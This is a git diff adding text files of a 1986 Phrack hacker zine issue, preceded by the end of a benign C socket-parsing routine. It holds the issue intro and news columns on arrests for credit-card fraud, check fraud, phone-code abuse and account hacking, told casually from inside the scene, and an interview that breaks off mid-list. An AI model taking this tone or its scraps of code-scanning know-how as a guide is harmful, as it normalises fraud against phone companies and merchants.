+ if (!cbcb_test_sock(hosts[host].cfd)) /* nothing to read */
+ {
+ if (nretry>hosts[host].timeout)
+  {
+  fprintf(stderr,"timeout waiting to recv response\n");
+  return(0);
+  }
+ fprintf(stderr,".");
+ nretry++;
+ sleep(1);
+ goto recv_resp;
+ }
+nbytes=recv(hosts[host].cfd,buffer,sizeof(buffer),0);
+if (nbytes<0) /* an error shouldn't happen here */
+ {
+ perror_sock("response recv()");
+ return(0);
+ }
+/* #ifdef DEBUG */
+ fwrite(buffer,1,nbytes,stdout); /* for debugging only!! */
+/* #endif */
+/* now see if what we received makes sense */
+for (i=0; i<nbytes; i++)
+ {
+ switch(parse_state)
+  {
+ case 0:
+  if (buffer[i]==c)
+   parse_state=1;
+  else
+   goto recv_bad_resp;
+  break;
+ case 1:
+  if (buffer[i]==ASCII_CR)
+    parse_state=2;
+  break;
+ case 2:
+  if (buffer[i]==ASCII_LF)
+   parse_state=3;
+  else
+   goto recv_bad_resp;
+  break;
+ case 3:  /* more data after final \n */
+   goto recv_bad_resp;
+  }
+ }
+
+if (parse_state!=3)
+ goto recv_resp;
+/* normal competion */
+return(1);
+
+recv_bad_resp:
+ fprintf(stderr,"Unexpected response (expected %cxx message) ",c);
+ if (i)
+  {
+  fprintf(stderr,"after \"");
+  fwrite(buffer,1,i,stderr);
+  fprintf(stderr,"\" ");
+  }
+ if (i<nbytes)
+  {
+  fprintf(stderr,"before \"");
+  fwrite(buffer+i,1,nbytes-i,stderr);
+  fprintf(stderr,"\"");
+  }
+ fprintf(stderr,"\n");
+return(0);
+}
+
+int cbcb_copy_buffer(char *s)
+{
+i=j=0;
+   if (nbytes>0&&buffer[nbytes-1]!='\n')
+    buffer[nbytes++]='\n';
+  buffer[nbytes]=0;
+
+while (buffer[i])
+ {
+ if (j>=BUFFERSIZE)
+  {
+  fprintf(stderr,"File too big\n");
+  return(0);
+  }
+ if (buffer[i]=='\n')
+  *(s+(j++))='\r';
+ *(s+(j++))=buffer[i++];
+ }
+*(s+j)=0;
+return(1);
+}
+
+---------------8<-------cut me loose!-------------->8--------------------------
+
+
diff --git a/phrack5/1.txt b/phrack5/1.txt
new file mode 100644
index 0000000..45ff539
--- /dev/null
+++ b/phrack5/1.txt
@@ -0,0 +1,43 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #1 of 12
+
+                              Intro to Phrack V!
+                              ~~~~~ ~~ ~~~~~~ ~~
+                                    4/18/86
+
+         Welcome to Phrack Inc. Issue Five!  Thanks to you, the readers, we
+have received a good following and will continue to pump out issues!  Your
+support has been fantastic and I'm happy to say that more people out there that
+know their stuff are coming out of the woodwork and writing philes to be
+distributed with Phrack Inc.  Recently, I received a letter from a law firm in
+New York complaining about the Master Lock Picking phile in Issue One of Phrack
+Inc.  This was written by Ninja NYC and Gin Fizz, both of The Punk Mafia.  It
+was a top class phile and it worked...but that was the problem.  They wished me
+to do something about the material stated.  Details of this story can be read
+in this edition of Phrack World News.  Let me state here though, all philes
+that are distributed with Phrack Inc. are merely being transmitted, and we are
+not responsible for the philes' content any more than the readers are.  The
+philes are the responsibility of the writers, and I'm not trying to lay the
+blame on Ninja NYC and Gin Fizz (see the letter I wrote to the firm stating my
+position here), but we will not be blamed for a crime that has not been
+committed.  Look forward to many more issues of Phrack Inc. in the far future!
+
+                                            TARAN KING
+                                   Sysop of Metal Shop Private
+
+This issue contains the following philes:
+
+#1  Phrack V Intro by Taran King
+#2  Phrack Pro-Phile of Broadway Hacker by Taran King
+#3  Hacking Dec's by Carrier Culprit
+#4  Hand to Hand Combat by Bad Boy in Black
+#5  DMS-100 by Knight Lightning
+#6  Bolt Bombs by The Leftist
+#7  Wide Area Networks Part 1 by Jester Sluggo
+#8  Radio Hacking by The Seker
+#9  Mobile Telephone Communications by Phantom Phreaker
+#10-12  Phrack World News IV by Knight Lightning
+
+===============================================================================
+
diff --git a/phrack5/10.txt b/phrack5/10.txt
new file mode 100644
index 0000000..33384dc
--- /dev/null
+++ b/phrack5/10.txt
@@ -0,0 +1,317 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #10 of 12
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                  ///\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\\
+Metal Shop PRIVATE\\\  Phrack World News Issue 4 Part 1  ///_  _       _______
+Metal Shop AE      \\\                                  ///| \/ |     / _____/
+Metal Shop Brewery  \\\           Compiled by          /// |_||_|etal/ /hop
+                     \\\                              ///  _________/ /
+Present PWN IV        \\\///\\ Knight Lightning //\\\///  /__________/
+--------------               \-^^^^^^-^^^^^^^^^-/             Triad
+_______________________________________________________________________________
+
+Phrack Inc. Vs. Master Lock Company                               April 1, 1986
+-----------------------------------
+Ok, yeah the date says April 1st, but this NOT a joke.  The following is a
+letter from Chadbourne & Parke.  I am substituting "Taran King" for Taran's
+real name.
+-------------------------------------------------------------------------------
+                                                                 March 26, 1986
+
+Dear Mr. King,
+    This law firm is counsel to Master Lock Company.  Our client has recently
+been alerted to the dissemination through a Bulletin Board Computer Service
+located at your address of information potentially damaging to its commercial
+interests and business relationships.  More particularly, we refer to the
+publication by such computer service of instructions for picking combination
+locks manufactured by Master Lock Company.
+
+    We write to notify you of Master Lock Company's concern about the computer
+service's actions and the seriousness with which it regards those actions.
+Master Lock Company has every intention of preserving and protecting the
+reputation and goodwill associated with its products and, if necessary, will
+take every legal recourse available to it to do so.
+
+    Under the present circumstances, however, our client would first like to
+give you the opportunity to take measures to prevent activities that it can
+only view as malicious both toward itself and toward its customers.  We
+therefore request that you see to the immediate and permanent cessation of the
+actions described above.  Your compliance with this request is all that is
+required for an amicable resolution of this matter.
+
+                  Your cooperation will be much appreciated.
+
+
+                                                 Very truly yours,
+
+                                                 Terrence J. Farrell
+-------------------------------------------------------------------------------
+This letter is of course talking about phile #6 of Phrack Issue I, entitled,
+"How To Pick Master Locks".  It was kinda funny but they even had a misspelled
+word in their letter, that I corrected above.  They sent it to Taran King in
+certified mail, in which he had to sign for it.  Taran has since responded with
+the following letter:
+-------------------------------------------------------------------------------
+         Dear Sirs,                                   4/1/86
+
+    My name is Taran King, as you so easily researched, and I used to run Metal
+Shop, an electronic bulletin board system.  I currently run a private line for
+personal friends of mine, and if asked, I distribute "general files" for them.
+The fact that I distributed the file is hardly the point.  I merely obtained it
+from the authors of the file and distributed it to other sources, who
+apparently distributed it other places.  If I am responsible for this file, I
+believe you should find a number of other authors also.
+
+    It is not only this file that you have written me about that the
+information about the "secret" to picking Master locks is included in, but also
+a number of other files that have been circulating for years.  It is old
+information, someone just re-published it.  Although on this topic, I am not
+well informed, I believe it is legal to print information on such a topic.  We
+do not condone the actions promoted by the files, but merely inform the public
+on the topic of this.  I hate to run on, but I wish to make my point as clearly
+as possible.
+    If I, being one of the people it was passed through, am responsible for the
+crime rate today of people picking Master, American, or any other company's
+locks, then I believe anyone who has the file, or has read books should be
+arrested on this.  I believe Paladin Press publishes a number of books on this
+topic.  I have seen one of the "Picking Master Locks in 3-Easy Steps!" type
+books and as far as I know, it's still in publication and distribution.
+    I hope I'm not sounding disrespectful or condescending, but it annoys me to
+a great degree when I must be questioned by my father about a letter that has
+come in the mail from a law firm in New York.  Please expect a letter from him
+inquiring upon the topic that you have written me on.  If you wish to have
+further discussion, feel free to call me at my voice line whenever you want to
+at (314) XXX-XXXX.  Don't play funny like you did with the letter and reverse
+the charges or something entertaining like that please.
+
+                                            Sincerely,
+
+                                            Taran King
+-------------------------------------------------------------------------------
+If any of you are wondering as to how they found Taran, well CN/A is not
+exclusively for phone phreaks and the number to Metal Shop was published in
+Phrack I in most of the files. My theory about how they found this file is:
+
+A. Some agent type is looking around (hell we all know they are out there), he
+   sees the file and passes it on to Master Lock Company;
+B. Some rodent dork type whose dad works for Master Lock Company sees it and
+   says, "Hey Dad, look, this is really neat!"
+
+I guess it really doesn't matter... Knight Lightning
+_______________________________________________________________________________
+
+Lex Luthor Speaks About TWCB                              Sunday March 22, 1986
+----------------------------
+The following is a message from Lex Luthor regarding TWCB Inc.
+-------------------------------------------------------------------------------
+It has been brought to my attention that TWCB Inc. is "throwing around large
+amounts of BS involving me". I have NEVER spoken to them, not on a conference,
+bbs, or anything.
+
+They have no affiliation with The Legion of Doom phreak group, nor The Legion
+Of Hackers hack group. Any references they make regarding me or any member of
+LOD or LOH should be disregarded since it's probably bullshit.
+
+TUC is working on Project Educate but there are no dates as of yet when an
+issue will be released. He scrapped the old first issue and is working on a
+better quality newsletter. I don't really have anything to do with Project
+Educate except that I may contribute some material.
+
+I just thought I would clear this up and if anyone hears anything different,
+please send me email with the information.
+
+One other thing that is on my mind is how some phreaks/hacks put down 2600
+Magazine as not being that great, not providing enough technical info, or
+providing too technical, etc. Well compared to the other rags out there, 2600
+does a pretty damn good job and are very consistent, you never have to worry
+about getting ripped off by them, and they are trustworthy. I don't agree with
+some of the ways they do things, but overall they are pretty good.
+
+I just wanted to get a few things off my chest.
+
+          Lex
+_______________________________________________________________________________
+
+TRASk, Animator, Ogre Ogre busted                            408 Under Siege
+----------------------------------                           ---------------
+This all happened towards the end of the week after the Phoenix Phortress Sting
+Operation.
+
+TRASk the sysop of Shattered World Elite, carded an IBM PC.  The person whose
+house it was to be delivered, happened to be at home when it arrived.  The
+owners promptly called the police who then set up a stake out and waited for an
+unsuspecting TRASk to waltz over and pick it up.  TRASk did and of course was
+caught red handed.
+
+Walking up to the house but staying on the street was the Animator.  He didn't
+like the looks of the situation and didn't stop walking.  He went to the home
+of BelGarion and Ogre Ogre (brothers).  Unknown to him he had been followed
+over.  Since he had cut school that day he stayed over there until 4PM.
+BelGarion and Ogre Ogre went to Animator's house and took all his computer
+equipment and illegally carded shit.  They hid it all in their house.  Minutes
+after Animator left BelGarion's home, he was picked up by the police.  He was
+then taken to Juvenile Detention where he found TRASk.
+
+Meanwhile the police went to TRASk's house first and took all his shit
+including the bbs, then over to Animator's.  When they got to Animator's house
+and couldn't find anything, his little brother told them that BelGarion and
+Ogre Ogre took everything. They then went to BelGarion's house where they found
+not only Animator's carded material but BelGarion's and Ogre Ogre's as well.
+
+The four of them spent the weekend together in Juvenile Detention.
+
+The charges included:
+
+o Fraudulent use of a credit card
+o Grand theft
+o Possession of stolen property
+
+The merchandise found at BelGarion's was in excess of $3,000.
+
+Being that BelGarion is 18 years old, Ogre Ogre, his younger brother, took full
+responsibility for the crimes.  As a result the charges against BelGarion were
+dropped.
+
+The court case is expected to take place in mid-April 1986.
+
+The interesting part about this story is that TRASk and the others were members
+of the Nihilist Order.  This group had most of its members busted or under
+surveillance already due to the Phoenix Phortress Sting Operation in Fremont,
+California.  Is there a connection?
+
+BelGarion says no, and that the Nihilist Order was really a loosely connected
+bunch.  It was however started by TRASk and The Highwayman.
+
+TRASk was released with a $100 fine and probation and 100 hours of community
+(civil) service work.  His bbs, The Shattered World Elite, will be going back
+up sometime in the future.
+
+For information about the Phoenix Phortress Sting Operation see Phrack World
+News Issue III.
+
+  Information provided by BelGarion 408 in an interview with Knight Lightning
+_______________________________________________________________________________
+
+Robin Hood and The Sultan Busted                                408 Under Siege
+--------------------------------                                ---------------
+This event took place around the last week of March in California, the 408
+area.
+
+Robin Hood had sprained his ankle at a wrestling meet and as a result was laid
+up at home for several days.  On one such day, he awoke at 1:30 PM in the
+afternoon to hear people outside his house, trying to force his doors opened.
+Hobbling around on his crutches, he made it to the kitchen where he ran into
+three police officers, two special investigators, and one guy from PacBell
+Security.
+
+His first cry was, "You had better have a warrant!"  Sure enough they did.  He
+noticed MCI codes and dialups written on it as well as passwords to TRW.
+(Editor's Note: Obviously what they were looking for.)   They went to his room
+and went through his computer disks (one of which was labeled phreaking and
+hacking, they jumped for that one), printouts, notebooks, and anything else
+they could find.  They took everything including his modem, printer, phone, and
+computer.
+
+Among what was confiscated were printouts of Phrack Issues I-III, Hack
+Newsletter (all issues to date), tons of other G-philes, and Lex Luthor's
+Hacking Cosmos series.   Also taken were all of his board numbers he was on and
+all his passwords.  Luckily for Metal Shop PRIVATE, he had not yet received the
+new general password.  Boards that should be wary include the Alliance and
+P-80.
+
+His charges include:
+
+o Annoying Calls (Scanning Prefixes)
+o Defrauding the phone company
+o Illegal entry (Hacking)
+o Scanning MCI dialups (I don't know what the legal name for that would be)
+
+His and Sultan's court case comes up on April 18th 1986 1:00 PM.
+
+As for the Sultan, upon being busted, Robin Hood tried to get in touch with him
+at school, not knowing that the group that had paid him a visit had come from
+the Sultan's earlier around 11:30 AM.  When he finally did reach him around
+4:00 PM after school at swim practice, it was much too late.  Sultan's dad
+supposedly held a government related job. (I have no idea if it was a political
+one or not).
+
+The police had grabbed everything Sultan had as well, including his phone.
+Since his bust he has had his phone line disconnected.
+
+Robin Hood said that he was told that he had been under surveillance for 2-3
+months previous to his arrest.
+
+He also recalled that the police had a third warrant for someone in a different
+town.  He did not recognize the name, nor did he hear anything about it later.
+
+(Editor's Note: Their accounts on Metal Shop PRIVATE were removed long ago, so
+ MSP users don't be worried.)
+
+ Information provided by Robin Hood during an interview with Knight Lightning
+_______________________________________________________________________________
+
+TWCB: Peter Arrested Again                                          TAP Trouble
+--------------------------                                          -----------
+In the last week of March, while on spring break, Peter of TWCB Inc. was
+arrested (or maybe just picked up) for leaving his home while under a court
+order to stay confined there under his mother's reconnaissance.
+
+He was picked up by the same detective that busted TWCB Inc. in the first
+place. Evidently he had been staking out their condominium for some time.
+
+Not only does this add to their LARGE record and current charges, but it will
+be used to show the court that TWCB's mom has no control over them.  This will
+hurt their defense.
+
+Many questions have arisen about the upcoming court case against TWCB.  Most
+notably, how will they be able to publish TAP Magazine with such a record and
+constant surveillance?  Since their bust was basically non-phreak/hack related
+maybe there is no real reason to fear any problems arising of information
+trading for a lighter sentence if (when) found guilty.
+
+However, their bust also concerned fraudulent use of a credit card.  What if
+that were to be tied in to phreak/hack bulletin boards?
+-------------------------------------------------------------------------------
+Since the topic of TWCB has already been brought up, I'd like to mention some
+of the other things that have been going on concerning them.
+
+Fights breaking out between them and Sigmund Fraud have cleared up.  This does
+not necessarily mean that they will not resume.  Fights with Slave Driver that
+led to their being kicked off of Stronghold East Elite, have also cleared up.
+Not wanting to have a reputation for kicking people off SEE for personal
+reasons, Slave Driver has allowed TWCB to return.  It is not yet known if they
+have done so as of yet.
+
+On the other hand, with their co-sysop access, TWCB kicked Broadway Hacker off
+of Spectre III (Which is sysoped by The Overlord of 815).  He in turn kicked
+them off of the Radio Station BBS.  Hostilities raged between the two, but
+Broadway Hacker publicly apologized on Metal Shop (and I suppose on several
+other bbses as well) to TWCB, and asked them to remove their vulgar posts about
+him.  TWCB made no comment.
+
+Broadway Hacker did kick TWCB off The Radio Station.  Later he welcomed them
+back on, but now with their refusal to call, his invitation no longer exists.
+_______________________________________________________________________________
+
+SBS Acquisition Completed                                            March 1986
+-------------------------
+On February 28, MCI completed its acquisition of Satellite Business Systems
+from IBM in exchange for approximately 47 million shares of MCI Common stock,
+of 16.7 percent of the 282 million shares now outstanding.  The Federal
+Communications Commission (FCC) approved the transfer to MCI of authorizations
+held by SBS on February 14.  The transaction was announced as an agreement in
+principle on June 25, 1985.
+
+The majority of SBS employees have joined MCI, bringing MCI's employment to
+14,800.
+
+Initially, for SBS's 200,000 customers, the acquisition brings no change in
+service or rates.  Eventually, the SBS system will be combined with MCI's more
+extensive domestic and international network.
+
+                       Taken from MCI World, March 1986
+_______________________________________________________________________________
+
+
diff --git a/phrack5/11.txt b/phrack5/11.txt
new file mode 100644
index 0000000..4bc9c0d
--- /dev/null
+++ b/phrack5/11.txt
@@ -0,0 +1,315 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #11 of 12
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                  ///\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\\
+Metal Shop PRIVATE\\\  Phrack World News Issue 4 Part 2  ///_  _       _______
+Metal Shop AE      \\\                                  ///| \/ |     / _____/
+Metal Shop Brewery  \\\           Compiled by          /// |_||_|etal/ /hop
+                     \\\                              ///  _________/ /
+Present PWN IV        \\\///\\ Knight Lightning //\\\///  /__________/
+--------------               \-^^^^^^-^^^^^^^^^-/             Triad
+_______________________________________________________________________________
+
+More Computel                                             Sunday March 29, 1986
+-------------                                             ---------------------
+The following post was seen on Stronghold East Elite on the above date,
+concerning Computel.  I am reprinting it in Phrack for the sole purpose to
+spread this important news and to help 2600 Magazine get to the bottom of this
+mess, and to help everyone get their money back.
+-------------------------------------------------------------------------------
+People,
+    PLEASE tell us whatever you know about Computel, even if it doesn't seem
+important.  We are charging full speed ahead with our investigation and we've
+already uncovered some wild things but we can't reveal what we have until we're
+finished. We also need info on that old magazine called Tel from the 70's.
+
+Yes, we did determine that there was a connection between the two but that's
+all we can say right now.  Any info or even back copies would help. We need
+people to actually complain about losing money.  So far that's been the hardest
+thing to do.  Phone phreaks as a rule don't seem to want to put their name on
+anything, but if you've lost money, this is the only way we can get it back for
+you and at the same time, stop this operation.
+
+We need people who live near or in Van Nuys, California. We need those of you
+with special access to credit information or phone information to get in touch
+with us. PLEASE DON'T DELAY!  Send us E-mail or call (516) 751-2600.
+
+                      Information posted by 2600 Magazine
+-------------------------------------------------------------------------------
+Editor's Note: Thomas Covenant added that he had heard that Computel is
+               unregistered and plans on staying that way.  Thus the Better
+               Business Bureau can do nothing.
+_______________________________________________________________________________
+
+Dr. Who in Trouble                                       Tuesday March 31, 1986
+------------------
+The following is Lex Luthor's interpretation and information on the Dr. Who
+story.  He also discusses Twilight Zone and Catch 22.  It was posted in several
+places (most notably Stronghold East Elite) and was confirmed in interview with
+Lex Luthor by Knight Lightning on April 4, 1986.
+-------------------------------------------------------------------------------
+The Twilight Zone will be back up in 1-2 weeks. Those who Marauder wants on
+will be contacted with all the new logon info, along with a number to reach it
+at.  He has been doing some mods to the software so the board has been down.
+Silver Spy, Sysop of Catch-22 has had some phone problems and as soon as the
+phone company fixes it he will have it back up. Both boards did go down for a
+few days after the Doctor Who bust, but after we found out why he was busted,
+the boards went back up.
+
+The Secret Service came to Who's house and took everything, he was not home at
+the time, but after 1-2 days, they finally got around to questioning him. As
+you know, the Secret Service has been doing a lot of credit card
+investigations. Initially Pit Fiend of CA was busted for carding (Editor's
+Note: See last issue's quick notes as to Pit Fiend) and at the time he was
+speaking w/Who from time to time, thus some believe Who's bust was a result of
+P.F. leaking info to the S.S.
+
+LOD/H was not shaken up too much from Who's bust mainly because it was not
+Phreak/Hack related, merely credit related which LOD/H is not involved in. Who
+did not card anything, but we believe the S.S.'s motive for busting him was use
+of TRW. Incidentally, Who had a DNR on his line for 7 months some say it was
+for over a year, but either way, its a hell of a long time! That's about it,
+anyone need specific details, or heard anything otherwise let me know.
+
+                                      Lex
+
+                      Information provided by Lex Luthor
+
+(Editor's Note: Lex Luthor also mentioned that Dr. Who is being sued by AllNet)
+_______________________________________________________________________________
+
+2300 Club Members Busted                                              Cleveland
+------------------------                                              ---------
+Two have been caught for fraudulent use of a credit card and one has been
+arrested for car theft.
+
+The 2300 Club is now being compared and treated as a miniature mafia by local
+authorities.  This is mainly for other crimes including the blowing up of cars.
+King Blotto was, at one time at least, a member of this group.  There is
+absolutely NO information regarding King Blotto as being busted or as still
+being a member of the 2300 Club.
+_______________________________________________________________________________
+
+New Phreak/Hack Group                                             April, 6 1986
+---------------------
+The Dark Creaper (916), Brew Associates (215), Major Havoc (301), and one other
+whose handle is unknown to me at the current time are forming a new phreak/hack
+group.  Its name is "The IBM Syndicate".  They are currently looking for
+members to join.  Their bulletin boards, which are currently more or less
+public, will very soon be going private, thus making it harder to become a
+member.  Eventually the group will have 2 bbses and 2 AEs.  Mainly for the
+exchange of files and IBM kracked wares.  All of these bbses will be run on of
+course IBM, and I assume that having an IBM is a requirement to become a
+member.
+
+  Information provided by Dark Creaper through interview by Knight Lightning
+_______________________________________________________________________________
+
+Oryan Quest Busted/415 Gets Hit Again                             April 6, 1986
+-------------------------------------
+On Wednesday, April 2nd 1986, Oryan Quest was arrested on charges of computer
+invasion.  Technically they only had him on one charge but later evidence
+accounted for the other two.
+
+Oryan Quest was "busted" for hacking AT&T Mail, which is roughly similar to MCI
+Mail. He had three different accounts, but the San Mateo Police and FBI only
+had suspicion of one.  When they searched his home they found two more written
+down.
+
+The charges against Oryan Quest were dropped for several reasons:
+
+1. Illegal Search (they didn't have a warrant)
+2. Police Brutality and Harassment (pushed him around and slammed his head into
+   a car)
+
+The authorities searched his house while Oryan Quest was at school, which is
+where they later arrested him.
+
+What was taken includes the following:
+
+Loads of computer disks
+All printouts (his entire g-phile library)
+10 Meg drive
+Assorted Boxes (Blue, Red, Green, Silver)
+
+His passwords, bbs numbers, codes, etc were undiscovered. (He believes)
+
+No court date had been set as of yet, and it is believed that the prosecuting
+attorney will drop the case due to the earlier illegal proceedings by the SMPD.
+
+Prior to his arrest the SMPD had been monitoring his line and had found that he
+was scanning prefixes.  This is however is inadmissible in a court of law
+because at the time that they were monitoring his line there was not sufficient
+evidence for such action.
+
+AT&T Mail was accessible through an 800 number, which Oryan Quest did call
+direct.
+
+Some words from Oryan
+---------------------
+"I have no intention of quitting hacking."
+
+"My mistake was calling an 800 number direct and for fucking around with AT&T
+in the first place."
+
+"I am more of a hacker than a phreak."
+
+(Editor's note: When asked how he felt about what was happening he replied,
+"I'm not worried about it.")
+-------------------------------------------------------------------------------
+Some other interesting facts about Oryan was that he held a part time job as a
+PacTel Operator.  He, being 15 years old, had lied about his age (saying he was
+16), but now has been fired.
+
+Also SRI has given him a job offer for computer security.  He is thinking about
+it but doesn't plan on accepting it.
+
+   Information provided by Oryan Quest through interview by Knight Lightning
+_______________________________________________________________________________
+
+Overlord 815 Arrested For Check Fraud
+-------------------------------------
+                   "The only reason I got caught was greed."
+
+That was the Overlord (815)'s first statement to me during an interview on
+April 6, 1986.  He says that originally, a long time ago, he concentrated on
+Western Union, but then later turned to credit card fraud.  As he progressed,
+he learned that credit card fraud only worked about 5% of the time.  He wanted
+something that worked 100% of the time.  He found it...check fraud.
+
+In his home town he acquired around $4,000 worth of equipment from 3 stores.
+Some of the merchandise consisted of an Apple //e (with every card possible,
+the best drives, monitors, etc...), a complete Commodore 128 system, and ten
+packs of disks for good measure. His downfall was going back to one of the same
+stores the next day to try it again.
+
+He was instantly caught and tricked by the police to reveal more than he would
+have if he had really known his rights.
+
+Check fraud is a felony crime.  Although I myself am uninformed as to how to
+perform the art of check fraud, it must require a phone because Overlord (815)
+informs me that the police have labeled his crime as Telefelony.  The actual
+charge however is for "theft by deception".
+
+His home was not searched and he has given all the merchandise back.
+
+He had told me that he plans to stop running his bulletin board Spectre III and
+sell his computer.  This is mainly so he cannot be referred to as a computer
+hacker.  IE: The prosecuting lawyer would ask, "Do you have a computer?!" He
+can truthfully say NO.
+
+He plans to have the bbs run from the home of The Master (815) and the number
+would stay the same.
+
+Another account of this story by TWCB Inc, says that Overlord has changed his
+mind and is not selling his computer or taking down Spectre III.
+
+The court date is set at April 9, 1986, Overlord (815) says that the worst that
+can happen is probation, a fine, civil service work, or any combination of the
+three.
+
+ Information provided by Overlord (815) during interview with Knight Lightning
+_______________________________________________________________________________
+
+TAP: Latest News From TWCB                                        April 8, 1986
+--------------------------
+Well, as many of you may have noticed, TWCB Inc. did not fulfill their promise
+of having TAP Magazine out by April 7, 1986.  When asked about this on that
+date, they replied that they had all the stuff, but it had to be typeset,
+formatted, printed, and distributed.  They estimated that they could have it
+done in another four days.  This secondary deadline was also not achieved.
+
+The writers (according to TWCB) include:
+
+    Abbie Hoffman/Ace/Final Impulse/Gary Seven/Knight Lightning/Mark Tabas/
+Taran King/Susan Thunder/The Bootleg/The Cracker/The Firelord/The Metallian/TUC
+
+The magazines supporting TAP include:
+
+        Mad Mad Magazine/High Times/Bootlegger Magazine/Hacker Magazine
+
+Scan Man dropped himself from the TAP Staff.
+
+By issue #6, TWCB plans to have a 112 page magazine.  This is due to the fact
+that by then they plan to be receiving many more articles and will have several
+more companies advertising.
+
+The first issue of TAP Magazine will have articles on the following topics:
+
+ISDN: Parts by Taran King and The Bootleg
+Fiber Optics
+Cellular Phones
+Satellite Jamming
+Moving Satellites
+The Teltec Bust: Surfer Bill/The Firelord/TWCB Inc/Knight Lightning
+Dr. Who Bust
+History of TAP
+RSTS 8.0
+Signalling Systems: Taken from Phrack Inc. Newsletter
+Introduction to PBXs: by Knight Lightning, taken from Phrack Inc. Newsletter
+ROLM: By Monty Python, taken from Phrack Inc. Newsletter
+MCI Overview: by Knight Lightning, taken from Phrack Inc. Newsletter
+New BBS Laws: by Sally Ride, taken from Bootlegger Magazine
+Cosmos: by Lex Luthor and the Legion of Hackers, taken from Bootlegger Magazine
+Private Audience: by Final Impulse, taken from Phrack Inc. Newsletter
+UNIX: by The Cracker
+MAX Profile: by Phantom Phreaker, taken from Phrack Inc. Newsletter
+Crashing Dec 10s: by The Mentor, taken from Phrack Inc. Newsletter
+Pak Time: by Kerrang Khan
+Techniques of Tracing
+ESS: by Mark Tabas
+
+   Information provided by TWCB Inc. during interview with Knight Lightning
+_______________________________________________________________________________
+
+Quick Notes
+-----------
+On March 23, 1986, The Radio Station BBS in New York celebrated its one year
+anniversary.  It now has one meg of storage online.
+-------------------------------------------------------------------------------
+The rumor that Taran King was on a talk/news program in New York discussing
+hacking is completely wrong.  Dead Lord started it, but as yet no one knows
+why.
+-------------------------------------------------------------------------------
+The Tempest in 805 was burglarized in March.  His computer and all other
+equipment among other things were stolen.  This of course explains his absence
+from the bbs world for a while.
+-------------------------------------------------------------------------------
+A reasonably new IBM kracking group, which was formally the Imperial Warlords,
+now known as Five-O, are re-kracking software and claiming it to be original by
+themselves. Futhermore they are placing insulting messages inside the software
+towards certain individuals.
+-------------------------------------------------------------------------------
+The Kidd of 408 got busted for busted for selling codes at his school for five
+dollars a piece.  There was no particular company mentioned.
+-------------------------------------------------------------------------------
+Video Stalker (408) carded some stuff to the home of Sinbad!  Sinbad! told him
+that he would sign for the stuff, and when he did, he was arrested.  No more
+details available.
+-------------------------------------------------------------------------------
+The Tunnel, one of Austin, Texas's oldest phreak/hack boards, has come out of
+the closet.  The Tunnel was revealed on the local news to be run by the
+computer crime division of the Austin Police Department. The two main goals of
+the board were to A) catch carders and B) catch Mentor and Cisban Evil Priest
+trying to sell those stolen computers.  They were very successful at A.
+-------------------------------------------------------------------------------
+Stronghold East elite has announced its new advisors.  Hack Advisor: Lex Luthor
+Phreak Advisor: Blue Buccaneer.  The soon plan to have a name change due to the
+fact that Apple Commander of Stronghold North insists they the two boards are
+affiliated while Slave Driver and Equalizer of Stronghold East feel
+differently.  With instruction from Lex Luthor, SEE has enacted new security
+measures.
+-------------------------------------------------------------------------------
+Thanx to 2600 Magazine, Stronghold East Elite now has the complete court
+transcripts of the bust that took place early last summer, most notably
+concerning Private Sector and 6 others, online for viewing.
+-------------------------------------------------------------------------------
+Sigmund Fraud has been discharged as co-sysop of the Radio Station bbs.
+-------------------------------------------------------------------------------
+Captain Crunch of 512 has stated that an auto-dial program that he wrote and
+uploaded was copied by TWCB Inc., who then claimed it as their own and signed
+their name in it.
+_______________________________________________________________________________
+
diff --git a/phrack5/12.txt b/phrack5/12.txt
new file mode 100644
index 0000000..7a7ceac
--- /dev/null
+++ b/phrack5/12.txt
@@ -0,0 +1,279 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #12 of 12
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                  ///\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\\
+Metal Shop PRIVATE\\\  Phrack World News Issue 4 Part 3  ///_  _       _______
+Metal Shop AE      \\\                                  ///| \/ |     / _____/
+Metal Shop Brewery  \\\           Compiled by          /// |_||_|etal/ /hop
+                     \\\                              ///  _________/ /
+Present PWN IV        \\\///\\ Knight Lightning //\\\///  /__________/
+--------------               \-^^^^^^-^^^^^^^^^-/             Triad
+_______________________________________________________________________________
+
+             Demise of Phreakdom in Florida:  The Story of Teltec
+
+                  Interview with Surfer Bill by The Firelord
+
+                          Written by Knight Lightning
+===============================================================================
+Firelord (FL):  Bill, I wanted to ask you some stuff on that bust you were
+                telling me about.
+
+Surfer Bill (SB):  Yeah, whatta ya want to know?
+
+FL: Who the hell got busted?
+
+SB: Well, you wanna know who knows a hell of a lot more than me is Jack Flack.
+    He has the subpoena, it's about 40 pages, it lists every single one of
+    their names, and all the charges word for word, it's incredible.
+
+FL: Jack Flack isn't accepting phone calls, it's probably not a very good idea.
+
+SB: Teltec is based in Miami, they got really pissed off that everyone was
+    abusing their services.  I mean using their codes and things like that.
+    These people aren't stupid. I mean they know if you've got a sequential
+    hacker on.  They know because what happens is that their computer registers
+    every single bad code.  So If they see 20000, 20001, 20002, and keeps on
+    going registering as bad codes and all of the sudden 20011 doesn't
+    register, but 20012 does then they know that 20011 is a good code.  What
+    they will do is monitor this code and watch it for abnormal usage. They
+    will be sitting there saying, 'Hey this code has been getting a lot of use
+    in the past few days.'  Then they will put a tracer on, trace the person,
+    tap the line, and start amassing information about the line owner. It is
+    like putting a noose around your own neck!
+
+    Basically what I heard is happening down here is that, I believe, there are
+    five bulletin board systems in the Miami/Fort Lauderdale/Boca Raton area
+    that they are after.
+
+    Caeser's Palace (Sysoped by Caeser D, Whose real name is John Kessler)
+    Parasec  (Sysoped by Mark Barochich {sic})
+    COPS
